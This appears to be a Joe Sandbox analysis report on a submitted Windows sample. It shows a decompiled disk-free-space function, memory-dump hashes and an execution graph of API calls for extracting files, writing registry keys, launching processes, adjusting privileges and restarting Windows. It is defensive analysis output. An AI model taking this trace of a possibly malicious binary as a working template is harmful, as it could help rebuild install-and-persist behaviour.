                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E00E86952(CHAR* __ecx) {
                                                                                                                                                                                                        				long _v8;
                                                                                                                                                                                                        				long _v12;
                                                                                                                                                                                                        				long _v16;
                                                                                                                                                                                                        				char _v20;
                                                                                                                                                                                                        				int _t22;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t22 = 0;
                                                                                                                                                                                                        				_v12 = 0;
                                                                                                                                                                                                        				_v8 = 0;
                                                                                                                                                                                                        				_v20 = 0;
                                                                                                                                                                                                        				_v16 = 0;
                                                                                                                                                                                                        				if( *__ecx != 0) {
                                                                                                                                                                                                        					_t6 =  &_v20; // 0xe85760
                                                                                                                                                                                                        					if(GetDiskFreeSpaceA(__ecx,  &_v12,  &_v8, _t6,  &_v16) != 0) {
                                                                                                                                                                                                        						_t22 = MulDiv(_v8 * _v12, _v16, 0x400);
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return _t22;
                                                                                                                                                                                                        			}









                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GetDiskFreeSpaceA.KERNEL32(0000005A,?,?,`W,?,00000000,00E85760,?,A:\), ref: 00E8697F
                                                                                                                                                                                                        • MulDiv.KERNEL32(?,?,00000400), ref: 00E86999
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.430849344.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
• Associated: 00000000.00000002.430840109.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.430860781.0000000000E88000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.430893986.0000000000E8A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.430893986.0000000000E8C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_e80000_iOqzwbUlln.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: DiskFreeSpace
                                                                                                                                                                                                        • String ID: `W
                                                                                                                                                                                                        • API String ID: 1705453755-2113494416
                                                                                                                                                                                                        • Opcode ID: b259fd290a231c83e5843281da796c6f1859c54e64afbfdc1536c270fd0fdbbc
                                                                                                                                                                                                        • Instruction ID: bcc95a30d880ecff902cefa345080b0c4e6da8977f58f19b0fa85a9aaccbcb04
                                                                                                                                                                                                        • Opcode Fuzzy Hash: b259fd290a231c83e5843281da796c6f1859c54e64afbfdc1536c270fd0fdbbc
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 34F0E7B6D01228BBDB11DFE98844ADEBBBCEB48701F144196E614F2240D6719A048B91
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Execution Graph

                                                                                                                                                                                                        Execution Coverage:28.8%
                                                                                                                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                        Signature Coverage:0%
                                                                                                                                                                                                        Total number of Nodes:955
                                                                                                                                                                                                        Total number of Limit Nodes:25
2430->2431 2432 c2f3f 2430->2432 2654 c5164 2431->2654 2433 c2f5f 2432->2433 2635 c51e5 2432->2635 2782 c3a3f 2433->2782 2437 c2f71 2440 c303c 2437->2440 2667 c55a0 2437->2667 2443 c6ce0 4 API calls 2440->2443 2445 c2c6b 2443->2445 2444 c2f86 GetSystemDirectoryA 2446 c658a CharPrevA 2444->2446 2470 c52b6 2445->2470 2447 c2fab LoadLibraryA 2446->2447 2448 c2ff7 FreeLibrary 2447->2448 2449 c2fc0 GetProcAddress 2447->2449 2451 c3006 2448->2451 2452 c3017 SetCurrentDirectoryA 2448->2452 2449->2448 2450 c2fd6 DecryptFileA 2449->2450 2450->2448 2460 c2ff0 2450->2460 2451->2452 2715 c621e GetWindowsDirectoryA 2451->2715 2453 c3054 2452->2453 2454 c3026 2452->2454 2457 c3061 2453->2457 2725 c3b26 2453->2725 2455 c44b9 20 API calls 2454->2455 2459 c3037 2455->2459 2457->2440 2462 c307a 2457->2462 2734 c256d 2457->2734 2801 c6285 GetLastError 2459->2801 2460->2448 2464 c3098 2462->2464 2745 c3ba2 2462->2745 2464->2440 2468 c30af 2464->2468 2803 c4169 2468->2803 2471 c52d6 2470->2471 2479 c5316 2470->2479 2472 c5300 LocalFree LocalFree 2471->2472 2474 c52eb SetFileAttributesA DeleteFileA 2471->2474 2472->2471 2472->2479 2473 c538c 2475 c6ce0 4 API calls 2473->2475 2474->2472 2477 c2c72 2475->2477 2477->2379 2477->2387 2478 c535e SetCurrentDirectoryA 2481 c2390 13 API calls 2478->2481 2479->2478 2480 c65e8 4 API calls 2479->2480 2482 c5374 2479->2482 2480->2478 2481->2482 2482->2473 3109 c1fe1 2482->3109 2484 c1f9a 2483->2484 2486 c1f9f 2483->2486 2485 c1ea7 15 API calls 2484->2485 2485->2486 2487 c1fc0 2486->2487 2488 c44b9 20 API calls 2486->2488 2492 c1fd9 2486->2492 2489 c1fcf ExitWindowsEx 2487->2489 2490 c1ee2 GetCurrentProcess OpenProcessToken 2487->2490 2487->2492 2488->2487 2489->2492 2493 c1f23 LookupPrivilegeValueA AdjustTokenPrivileges CloseHandle 2490->2493 2495 c1f0e 2490->2495 2492->2379 2494 c1f6b ExitWindowsEx 2493->2494 2493->2495 2494->2495 2496 c1f1f 2494->2496 2497 c44b9 20 API calls 2495->2497 2498 c6ce0 4 API calls 2496->2498 2497->2496 2499 c1f8c 
2498->2499 2499->2379 2501 c2d1a 2500->2501 2502 c46b6 2500->2502 2501->2392 2501->2393 2502->2501 2503 c46be FindResourceA LoadResource LockResource 2502->2503 2503->2501 2504 c46df memcpy_s FreeResource 2503->2504 2504->2501 2511 c5e17 2505->2511 2514 c5cc3 2505->2514 2506 c5dd0 2510 c5dec GetModuleFileNameA 2506->2510 2506->2511 2507 c6ce0 4 API calls 2509 c2e2c 2507->2509 2508 c5ced CharNextA 2508->2514 2509->2407 2509->2408 2510->2511 2512 c5e0a 2510->2512 2511->2507 2581 c66c8 2512->2581 2514->2506 2514->2508 2514->2511 2515 c6218 2514->2515 2518 c5e36 CharUpperA 2514->2518 2524 c5f9f CharUpperA 2514->2524 2525 c5f59 CompareStringA 2514->2525 2526 c6003 CharUpperA 2514->2526 2527 c667f IsDBCSLeadByte CharNextA 2514->2527 2528 c60a2 CharUpperA 2514->2528 2529 c5edc CharUpperA 2514->2529 2586 c658a 2514->2586 2590 c6e2a 2515->2590 2518->2514 2519 c61d0 2518->2519 2520 c44b9 20 API calls 2519->2520 2521 c61e7 2520->2521 2522 c61f7 ExitProcess 2521->2522 2523 c61f0 CloseHandle 2521->2523 2523->2522 2524->2514 2525->2514 2526->2514 2527->2514 2528->2514 2529->2514 2532 c24cb 2531->2532 2535 c23b9 2531->2535 2533 c6ce0 4 API calls 2532->2533 2534 c24dc 2533->2534 2534->2416 2535->2532 2536 c23e9 FindFirstFileA 2535->2536 2536->2532 2544 c2407 2536->2544 2537 c2479 2541 c2488 SetFileAttributesA DeleteFileA 2537->2541 2538 c2421 lstrcmpA 2539 c24a9 FindNextFileA 2538->2539 2540 c2431 lstrcmpA 2538->2540 2542 c24bd FindClose RemoveDirectoryA 2539->2542 2539->2544 2540->2539 2540->2544 2541->2539 2542->2532 2543 c658a CharPrevA 2543->2544 2544->2537 2544->2538 2544->2539 2544->2543 2545 c2390 5 API calls 2544->2545 2545->2544 2550 c3737 2546->2550 2551 c372d 2546->2551 2547 c44b9 20 API calls 2560 c39fc 2547->2560 2548 c6ce0 4 API calls 2549 c2e92 2548->2549 2549->2396 2549->2416 2561 c18a3 2549->2561 2550->2551 2552 c38a4 2550->2552 2550->2560 2597 c28e8 2550->2597 2551->2547 2551->2560 2552->2551 2554 c39c1 MessageBeep 2552->2554 2552->2560 2555 c681f 10 API calls 
2554->2555 2556 c39ce 2555->2556 2557 c39d8 MessageBoxA 2556->2557 2558 c67c9 EnumResourceLanguagesA 2556->2558 2557->2560 2558->2557 2560->2548 2562 c19b8 2561->2562 2563 c18d5 2561->2563 2564 c6ce0 4 API calls 2562->2564 2626 c17ee LoadLibraryA 2563->2626 2566 c19d5 2564->2566 2566->2416 2566->2429 2568 c18e5 GetCurrentProcess OpenProcessToken 2568->2562 2569 c1900 GetTokenInformation 2568->2569 2570 c1918 GetLastError 2569->2570 2571 c19aa CloseHandle 2569->2571 2570->2571 2572 c1927 LocalAlloc 2570->2572 2571->2562 2573 c1938 GetTokenInformation 2572->2573 2574 c19a9 2572->2574 2575 c194e AllocateAndInitializeSid 2573->2575 2576 c19a2 LocalFree 2573->2576 2574->2571 2575->2576 2580 c196e 2575->2580 2576->2574 2577 c1999 FreeSid 2577->2576 2578 c1975 EqualSid 2579 c198c 2578->2579 2578->2580 2579->2577 2580->2577 2580->2578 2580->2579 2582 c66d5 2581->2582 2583 c66f3 2582->2583 2585 c66e5 CharNextA 2582->2585 2593 c6648 2582->2593 2583->2511 2585->2582 2587 c659b 2586->2587 2587->2587 2588 c65ab 2587->2588 2589 c65b8 CharPrevA 2587->2589 2588->2514 2589->2588 2596 c6cf0 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 2590->2596 2592 c621d 2594 c665d IsDBCSLeadByte 2593->2594 2595 c6668 2593->2595 2594->2595 2595->2582 2596->2592 2598 c2a62 2597->2598 2605 c290d 2597->2605 2599 c2a6e GlobalFree 2598->2599 2600 c2a75 2598->2600 2599->2600 2600->2552 2602 c2955 GlobalAlloc 2602->2598 2603 c2968 GlobalLock 2602->2603 2603->2598 2603->2605 2604 c2a20 GlobalUnlock 2604->2605 2605->2598 2605->2602 2605->2604 2606 c2a80 GlobalUnlock 2605->2606 2607 c2773 2605->2607 2606->2598 2608 c28b2 2607->2608 2609 c27a3 CharUpperA CharNextA CharNextA 2607->2609 2611 c28b7 GetSystemDirectoryA 2608->2611 2610 c27db 2609->2610 2609->2611 2612 c28a8 GetWindowsDirectoryA 2610->2612 2613 c27e3 2610->2613 2614 c28bf 2611->2614 2612->2614 2619 c658a CharPrevA 2613->2619 2615 c28d2 2614->2615 2616 c658a CharPrevA 2614->2616 2617 c6ce0 4 API calls 
2615->2617 2616->2615 2618 c28e2 2617->2618 2618->2605 2620 c2810 RegOpenKeyExA 2619->2620 2620->2614 2621 c2837 RegQueryValueExA 2620->2621 2622 c285c 2621->2622 2623 c289a RegCloseKey 2621->2623 2624 c2867 ExpandEnvironmentStringsA 2622->2624 2625 c287a 2622->2625 2623->2614 2624->2625 2625->2623 2627 c1826 GetProcAddress 2626->2627 2628 c1890 2626->2628 2629 c1889 FreeLibrary 2627->2629 2630 c1839 AllocateAndInitializeSid 2627->2630 2631 c6ce0 4 API calls 2628->2631 2629->2628 2630->2629 2633 c185f FreeSid 2630->2633 2632 c189f 2631->2632 2632->2562 2632->2568 2633->2629 2636 c468f 7 API calls 2635->2636 2637 c51f9 LocalAlloc 2636->2637 2638 c522d 2637->2638 2639 c520d 2637->2639 2641 c468f 7 API calls 2638->2641 2640 c44b9 20 API calls 2639->2640 2642 c521e 2640->2642 2643 c523a 2641->2643 2644 c6285 GetLastError 2642->2644 2645 c523e 2643->2645 2646 c5262 lstrcmpA 2643->2646 2653 c2f4d 2644->2653 2649 c44b9 20 API calls 2645->2649 2647 c527e 2646->2647 2648 c5272 LocalFree 2646->2648 2650 c44b9 20 API calls 2647->2650 2648->2653 2651 c524f LocalFree 2649->2651 2652 c5290 LocalFree 2650->2652 2651->2653 2652->2653 2653->2431 2653->2433 2653->2440 2655 c468f 7 API calls 2654->2655 2656 c5175 2655->2656 2657 c517a 2656->2657 2658 c51af 2656->2658 2659 c44b9 20 API calls 2657->2659 2660 c468f 7 API calls 2658->2660 2661 c518d 2659->2661 2662 c51c0 2660->2662 2661->2437 2816 c6298 2662->2816 2665 c51e1 2665->2437 2666 c44b9 20 API calls 2666->2661 2668 c468f 7 API calls 2667->2668 2669 c55c7 LocalAlloc 2668->2669 2670 c55fd 2669->2670 2671 c55db 2669->2671 2673 c468f 7 API calls 2670->2673 2672 c44b9 20 API calls 2671->2672 2674 c55ec 2672->2674 2675 c560a 2673->2675 2676 c6285 GetLastError 2674->2676 2677 c560e 2675->2677 2678 c5632 lstrcmpA 2675->2678 2701 c55f1 2676->2701 2681 c44b9 20 API calls 2677->2681 2679 c564b LocalFree 2678->2679 2680 c5645 2678->2680 2684 c5696 2679->2684 2685 c565b 2679->2685 2680->2679 2682 c561f LocalFree 2681->2682 2682->2701 2683 
c589f 2686 c6517 24 API calls 2683->2686 2684->2683 2688 c56ae GetTempPathA 2684->2688 2689 c5467 49 API calls 2685->2689 2686->2701 2687 c6ce0 4 API calls 2690 c2f7e 2687->2690 2691 c56eb 2688->2691 2692 c56c3 2688->2692 2693 c5678 2689->2693 2690->2440 2690->2444 2697 c586c GetWindowsDirectoryA 2691->2697 2698 c5717 GetDriveTypeA 2691->2698 2691->2701 2828 c5467 2692->2828 2696 c44b9 20 API calls 2693->2696 2693->2701 2696->2701 2862 c597d GetCurrentDirectoryA SetCurrentDirectoryA 2697->2862 2702 c5730 GetFileAttributesA 2698->2702 2713 c572b 2698->2713 2701->2687 2702->2713 2704 c597d 34 API calls 2704->2713 2705 c5467 49 API calls 2705->2691 2706 c2630 21 API calls 2706->2713 2708 c57c1 GetWindowsDirectoryA 2708->2713 2709 c658a CharPrevA 2710 c57e8 GetFileAttributesA 2709->2710 2711 c57fa CreateDirectoryA 2710->2711 2710->2713 2711->2713 2712 c5827 SetFileAttributesA 2712->2713 2713->2697 2713->2698 2713->2701 2713->2702 2713->2704 2713->2706 2713->2708 2713->2709 2713->2712 2714 c5467 49 API calls 2713->2714 2858 c6952 2713->2858 2714->2713 2716 c6268 2715->2716 2717 c6249 2715->2717 2718 c597d 34 API calls 2716->2718 2719 c44b9 20 API calls 2717->2719 2724 c625f 2718->2724 2720 c625a 2719->2720 2722 c6285 GetLastError 2720->2722 2721 c6ce0 4 API calls 2723 c3013 2721->2723 2722->2724 2723->2440 2723->2452 2724->2721 2726 c3b2d 2725->2726 2726->2726 2727 c3b72 2726->2727 2729 c3b53 2726->2729 2928 c4fe0 2727->2928 2731 c6517 24 API calls 2729->2731 2730 c3b70 2732 c6298 10 API calls 2730->2732 2733 c3b7b 2730->2733 2731->2730 2732->2733 2733->2457 2735 c2622 2734->2735 2736 c2583 2734->2736 2955 c24e0 GetWindowsDirectoryA 2735->2955 2738 c25e8 RegOpenKeyExA 2736->2738 2739 c258b 2736->2739 2740 c2609 RegQueryInfoKeyA 2738->2740 2741 c25e3 2738->2741 2739->2741 2743 c259b RegOpenKeyExA 2739->2743 2742 c25d1 RegCloseKey 2740->2742 2741->2462 2742->2741 2743->2741 2744 c25bc RegQueryValueExA 2743->2744 2744->2742 2746 c3bdb 2745->2746 2750 c3bec 2745->2750 2747 
c468f 7 API calls 2746->2747 2747->2750 2748 c3c03 memset 2748->2750 2749 c3d13 2752 c44b9 20 API calls 2749->2752 2750->2748 2750->2749 2751 c468f 7 API calls 2750->2751 2753 c3d26 2750->2753 2757 c3d7b CompareStringA 2750->2757 2758 c3fd7 2750->2758 2759 c3fab 2750->2759 2763 c3f1e LocalFree 2750->2763 2764 c3f46 LocalFree 2750->2764 2768 c3cc7 CompareStringA 2750->2768 2779 c3e10 2750->2779 2963 c1ae8 2750->2963 3004 c202a memset memset RegCreateKeyExA 2750->3004 3030 c3fef 2750->3030 2751->2750 2752->2753 2755 c6ce0 4 API calls 2753->2755 2756 c3f60 2755->2756 2756->2464 2757->2750 2757->2758 2758->2753 3054 c2267 2758->3054 2762 c44b9 20 API calls 2759->2762 2766 c3fbe LocalFree 2762->2766 2763->2750 2763->2758 2764->2753 2766->2753 2768->2750 2769 c3e1f GetProcAddress 2771 c3f64 2769->2771 2769->2779 2770 c3f92 2772 c44b9 20 API calls 2770->2772 2774 c44b9 20 API calls 2771->2774 2773 c3fa9 2772->2773 2775 c3f7c LocalFree 2773->2775 2776 c3f75 FreeLibrary 2774->2776 2777 c6285 GetLastError 2775->2777 2776->2775 2778 c3f8b 2777->2778 2778->2753 2779->2769 2779->2770 2780 c3eff FreeLibrary 2779->2780 2781 c3f40 FreeLibrary 2779->2781 3044 c6495 2779->3044 2780->2763 2781->2764 2783 c468f 7 API calls 2782->2783 2784 c3a55 LocalAlloc 2783->2784 2785 c3a6c 2784->2785 2786 c3a8e 2784->2786 2787 c44b9 20 API calls 2785->2787 2788 c468f 7 API calls 2786->2788 2789 c3a7d 2787->2789 2790 c3a98 2788->2790 2791 c6285 GetLastError 2789->2791 2792 c3a9c 2790->2792 2793 c3ac5 lstrcmpA 2790->2793 2798 c2f64 2791->2798 2796 c44b9 20 API calls 2792->2796 2794 c3b0d LocalFree 2793->2794 2795 c3ada 2793->2795 2794->2798 2797 c6517 24 API calls 2795->2797 2799 c3aad LocalFree 2796->2799 2800 c3aec LocalFree 2797->2800 2798->2431 2798->2440 2799->2798 2800->2798 2802 c628f 2801->2802 2802->2440 2804 c468f 7 API calls 2803->2804 2805 c417d LocalAlloc 2804->2805 2806 c41a8 2805->2806 2807 c4195 2805->2807 2809 c468f 7 API calls 2806->2809 2808 c44b9 20 API calls 2807->2808 2810 
c41a6 2808->2810 2811 c41b5 2809->2811 2810->2440 2812 c41b9 2811->2812 2813 c41c5 lstrcmpA 2811->2813 2815 c44b9 20 API calls 2812->2815 2813->2812 2814 c41e6 LocalFree 2813->2814 2814->2810 2815->2814 2817 c171e _vsnprintf 2816->2817 2827 c62c9 FindResourceA 2817->2827 2819 c62cb LoadResource LockResource 2820 c6353 2819->2820 2823 c62e0 2819->2823 2821 c6ce0 4 API calls 2820->2821 2822 c51ca 2821->2822 2822->2665 2822->2666 2824 c631b FreeResource 2823->2824 2825 c6355 FreeResource 2823->2825 2826 c171e _vsnprintf 2824->2826 2825->2820 2826->2827 2827->2819 2827->2820 2829 c548a 2828->2829 2847 c551a 2828->2847 2888 c53a1 2829->2888 2831 c5581 2835 c6ce0 4 API calls 2831->2835 2834 c5495 2834->2831 2840 c550c 2834->2840 2841 c54c2 GetSystemInfo 2834->2841 2842 c559a 2835->2842 2836 c554d 2836->2831 2843 c597d 34 API calls 2836->2843 2837 c553b CreateDirectoryA 2838 c5577 2837->2838 2839 c5547 2837->2839 2844 c6285 GetLastError 2838->2844 2839->2836 2845 c658a CharPrevA 2840->2845 2848 c54da 2841->2848 2842->2701 2852 c2630 GetWindowsDirectoryA 2842->2852 2849 c555c 2843->2849 2846 c557c 2844->2846 2845->2847 2846->2831 2899 c58c8 2847->2899 2848->2840 2850 c658a CharPrevA 2848->2850 2849->2831 2851 c5568 RemoveDirectoryA 2849->2851 2850->2840 2851->2831 2853 c265e 2852->2853 2854 c266f 2852->2854 2855 c44b9 20 API calls 2853->2855 2856 c6ce0 4 API calls 2854->2856 2855->2854 2857 c2687 2856->2857 2857->2691 2857->2705 2859 c696e GetDiskFreeSpaceA 2858->2859 2860 c69a1 2858->2860 2859->2860 2861 c6989 MulDiv 2859->2861 2860->2713 2861->2860 2863 c59dd GetDiskFreeSpaceA 2862->2863 2864 c59bb 2862->2864 2866 c5ba1 memset 2863->2866 2867 c5a21 MulDiv 2863->2867 2865 c44b9 20 API calls 2864->2865 2868 c59cc 2865->2868 2869 c6285 GetLastError 2866->2869 2867->2866 2870 c5a50 GetVolumeInformationA 2867->2870 2871 c6285 GetLastError 2868->2871 2872 c5bbc GetLastError FormatMessageA 2869->2872 2873 c5a6e memset 2870->2873 2874 c5ab5 SetCurrentDirectoryA 2870->2874 2875 
c59d1 2871->2875 2876 c5be3 2872->2876 2877 c6285 GetLastError 2873->2877 2883 c5acc 2874->2883 2881 c6ce0 4 API calls 2875->2881 2878 c44b9 20 API calls 2876->2878 2879 c5a89 GetLastError FormatMessageA 2877->2879 2880 c5bf5 SetCurrentDirectoryA 2878->2880 2879->2876 2880->2875 2882 c5c11 2881->2882 2882->2691 2884 c5b0a 2883->2884 2886 c5b20 2883->2886 2885 c44b9 20 API calls 2884->2885 2885->2875 2886->2875 2911 c268b 2886->2911 2890 c53bf 2888->2890 2889 c171e _vsnprintf 2889->2890 2890->2889 2891 c658a CharPrevA 2890->2891 2894 c5415 GetTempFileNameA 2890->2894 2892 c53fa RemoveDirectoryA GetFileAttributesA 2891->2892 2892->2890 2893 c544f CreateDirectoryA 2892->2893 2893->2894 2896 c543a 2893->2896 2895 c5429 DeleteFileA CreateDirectoryA 2894->2895 2894->2896 2895->2896 2897 c6ce0 4 API calls 2896->2897 2898 c5449 2897->2898 2898->2834 2900 c58d8 2899->2900 2900->2900 2901 c58df LocalAlloc 2900->2901 2902 c58f3 2901->2902 2905 c5919 2901->2905 2903 c44b9 20 API calls 2902->2903 2904 c5906 2903->2904 2907 c6285 GetLastError 2904->2907 2909 c5534 2904->2909 2906 c658a CharPrevA 2905->2906 2908 c5931 CreateFileA LocalFree 2906->2908 2907->2909 2908->2904 2910 c595b CloseHandle GetFileAttributesA 2908->2910 2909->2836 2909->2837 2910->2904 2912 c26b9 2911->2912 2913 c26e5 2911->2913 2916 c171e _vsnprintf 2912->2916 2914 c271f 2913->2914 2915 c26ea 2913->2915 2919 c26e3 2914->2919 2923 c171e _vsnprintf 2914->2923 2918 c171e _vsnprintf 2915->2918 2917 c26cc 2916->2917 2920 c44b9 20 API calls 2917->2920 2922 c26fd 2918->2922 2921 c6ce0 4 API calls 2919->2921 2920->2919 2924 c276d 2921->2924 2925 c44b9 20 API calls 2922->2925 2926 c2735 2923->2926 2924->2875 2925->2919 2927 c44b9 20 API calls 2926->2927 2927->2919 2929 c468f 7 API calls 2928->2929 2930 c4ff5 FindResourceA LoadResource LockResource 2929->2930 2931 c5020 2930->2931 2944 c515f 2930->2944 2932 c5029 GetDlgItem ShowWindow GetDlgItem ShowWindow 2931->2932 2933 c5057 2931->2933 2932->2933 2947 c4efd 
2933->2947 2936 c5060 2937 c44b9 20 API calls 2936->2937 2943 c5075 2937->2943 2938 c511d 2941 c513a 2938->2941 2945 c44b9 20 API calls 2938->2945 2939 c5110 FreeResource 2939->2938 2940 c44b9 20 API calls 2940->2943 2941->2944 2946 c514c SendMessageA 2941->2946 2942 c507c 2942->2940 2942->2943 2943->2938 2943->2939 2944->2730 2945->2941 2946->2944 2948 c4f4a 2947->2948 2949 c4fa1 2948->2949 2950 c4980 25 API calls 2948->2950 2951 c6ce0 4 API calls 2949->2951 2953 c4f67 2950->2953 2952 c4fc6 2951->2952 2952->2936 2952->2942 2953->2949 2954 c4b60 FindCloseChangeNotification 2953->2954 2954->2949 2956 c255b 2955->2956 2957 c2510 2955->2957 2958 c6ce0 4 API calls 2956->2958 2959 c658a CharPrevA 2957->2959 2960 c2569 2958->2960 2961 c2522 WritePrivateProfileStringA _lopen 2959->2961 2960->2741 2961->2956 2962 c2548 _llseek _lclose 2961->2962 2962->2956 2964 c1b25 2963->2964 3068 c1a84 2964->3068 2966 c1b57 2967 c658a CharPrevA 2966->2967 2968 c1b8c 2966->2968 2967->2968 2969 c66c8 2 API calls 2968->2969 2970 c1bd1 2969->2970 2971 c1bd9 CompareStringA 2970->2971 2972 c1d73 2970->2972 2971->2972 2974 c1bf7 GetFileAttributesA 2971->2974 2973 c66c8 2 API calls 2972->2973 2977 c1d7d 2973->2977 2975 c1c0d 2974->2975 2976 c1d53 2974->2976 2975->2976 2981 c1a84 2 API calls 2975->2981 2980 c1d64 2976->2980 2978 c1df8 LocalAlloc 2977->2978 2979 c1d81 CompareStringA 2977->2979 2978->2980 2982 c1e0b GetFileAttributesA 2978->2982 2979->2978 2988 c1d9b 2979->2988 2983 c44b9 20 API calls 2980->2983 2984 c1c31 2981->2984 2985 c1e45 2982->2985 2991 c1e1d 2982->2991 2986 c1d6c 2983->2986 2987 c1c50 LocalAlloc 2984->2987 2992 c1a84 2 API calls 2984->2992 3074 c2aac 2985->3074 2990 c6ce0 4 API calls 2986->2990 2987->2980 2989 c1c67 GetPrivateProfileIntA GetPrivateProfileStringA 2987->2989 2988->2988 2993 c1dbe LocalAlloc 2988->2993 2998 c1cf8 2989->2998 3002 c1cc2 2989->3002 2996 c1ea1 2990->2996 2991->2985 2992->2987 2993->2980 2997 c1de1 2993->2997 2996->2750 3001 c171e _vsnprintf 
2997->3001 2999 c1d09 GetShortPathNameA 2998->2999 3000 c1d23 2998->3000 2999->3000 3003 c171e _vsnprintf 3000->3003 3001->3002 3002->2986 3003->3002 3005 c209a 3004->3005 3013 c2256 3004->3013 3007 c171e _vsnprintf 3005->3007 3010 c20dc 3005->3010 3006 c6ce0 4 API calls 3008 c2263 3006->3008 3009 c20af RegQueryValueExA 3007->3009 3008->2750 3009->3005 3009->3010 3011 c20fb GetSystemDirectoryA 3010->3011 3012 c20e4 RegCloseKey 3010->3012 3014 c658a CharPrevA 3011->3014 3012->3013 3013->3006 3015 c211b LoadLibraryA 3014->3015 3016 c212e GetProcAddress FreeLibrary 3015->3016 3017 c2179 GetModuleFileNameA 3015->3017 3016->3017 3018 c214e GetSystemDirectoryA 3016->3018 3019 c21de RegCloseKey 3017->3019 3022 c2177 3017->3022 3020 c2165 3018->3020 3018->3022 3019->3013 3021 c658a CharPrevA 3020->3021 3021->3022 3022->3022 3023 c21b7 LocalAlloc 3022->3023 3024 c21ec 3023->3024 3025 c21cd 3023->3025 3027 c171e _vsnprintf 3024->3027 3026 c44b9 20 API calls 3025->3026 3026->3019 3028 c2218 RegSetValueExA RegCloseKey LocalFree 3027->3028 3028->3013 3031 c4106 3030->3031 3032 c4016 CreateProcessA 3030->3032 3035 c6ce0 4 API calls 3031->3035 3033 c40c4 3032->3033 3034 c4041 WaitForSingleObject GetExitCodeProcess 3032->3034 3037 c6285 GetLastError 3033->3037 3042 c4070 3034->3042 3036 c4117 3035->3036 3036->2750 3039 c40c9 GetLastError FormatMessageA 3037->3039 3041 c44b9 20 API calls 3039->3041 3040 c4096 CloseHandle CloseHandle 3040->3031 3043 c40ba 3040->3043 3041->3031 3101 c411b 3042->3101 3043->3031 3045 c64c2 3044->3045 3046 c658a CharPrevA 3045->3046 3047 c64d8 GetFileAttributesA 3046->3047 3048 c64ea 3047->3048 3049 c6501 LoadLibraryA 3047->3049 3048->3049 3050 c64ee LoadLibraryExA 3048->3050 3051 c6508 3049->3051 3050->3051 3052 c6ce0 4 API calls 3051->3052 3053 c6513 3052->3053 3053->2779 3055 c2289 RegOpenKeyExA 3054->3055 3056 c2381 3054->3056 3055->3056 3057 c22b1 RegQueryValueExA 3055->3057 3058 c6ce0 4 API calls 3056->3058 3059 c2374 RegCloseKey 3057->3059 3060 
c22e6 memset GetSystemDirectoryA 3057->3060 3061 c238c 3058->3061 3059->3056 3062 c230f 3060->3062 3063 c2321 3060->3063 3061->2753 3064 c658a CharPrevA 3062->3064 3065 c171e _vsnprintf 3063->3065 3064->3063 3066 c233f RegSetValueExA 3065->3066 3066->3059 3070 c1a9a 3068->3070 3071 c1aba 3070->3071 3072 c1aaf 3070->3072 3087 c667f 3070->3087 3071->2966 3072->3071 3073 c667f 2 API calls 3072->3073 3073->3072 3075 c2be6 3074->3075 3076 c2ad4 GetModuleFileNameA 3074->3076 3077 c6ce0 4 API calls 3075->3077 3086 c2b02 3076->3086 3079 c2bf5 3077->3079 3078 c2af1 IsDBCSLeadByte 3078->3086 3079->2986 3080 c2bca CharNextA 3082 c2bd3 CharNextA 3080->3082 3081 c2b11 CharNextA CharUpperA 3083 c2b8d CharUpperA 3081->3083 3081->3086 3082->3086 3083->3086 3085 c2b43 CharPrevA 3085->3086 3086->3075 3086->3078 3086->3080 3086->3081 3086->3082 3086->3085 3086->3086 3092 c65e8 3086->3092 3088 c6689 3087->3088 3089 c66a5 3088->3089 3090 c6648 IsDBCSLeadByte 3088->3090 3091 c6697 CharNextA 3088->3091 3089->3070 3090->3088 3091->3088 3093 c65f4 3092->3093 3093->3093 3094 c65fb CharPrevA 3093->3094 3095 c6611 CharPrevA 3094->3095 3096 c661e 3095->3096 3097 c660b 3095->3097 3098 c663d 3096->3098 3099 c6634 CharNextA 3096->3099 3100 c6627 CharPrevA 3096->3100 3097->3095 3097->3096 3098->3086 3099->3098 3100->3098 3100->3099 3102 c4132 3101->3102 3104 c412a 3101->3104 3105 c1ea7 3102->3105 3104->3040 3106 c1ed3 3105->3106 3107 c1eba 3105->3107 3106->3104 3108 c256d 15 API calls 3107->3108 3108->3106 3110 c2026 3109->3110 3111 c1ff0 RegOpenKeyExA 3109->3111 3110->2473 3111->3110 3112 c200f RegDeleteValueA RegCloseKey 3111->3112 3112->3110 3219 c6a20 __getmainargs 3220 c19e0 3221 c1a24 GetDesktopWindow 3220->3221 3222 c1a03 3220->3222 3224 c43d0 11 API calls 3221->3224 3223 c1a20 3222->3223 3225 c1a16 EndDialog 3222->3225 3227 c6ce0 4 API calls 3223->3227 3226 c1a33 LoadStringA SetDlgItemTextA MessageBeep 3224->3226 3225->3223 3226->3223 3228 c1a7e 3227->3228 3229 c6fbe GetModuleHandleW 3230 
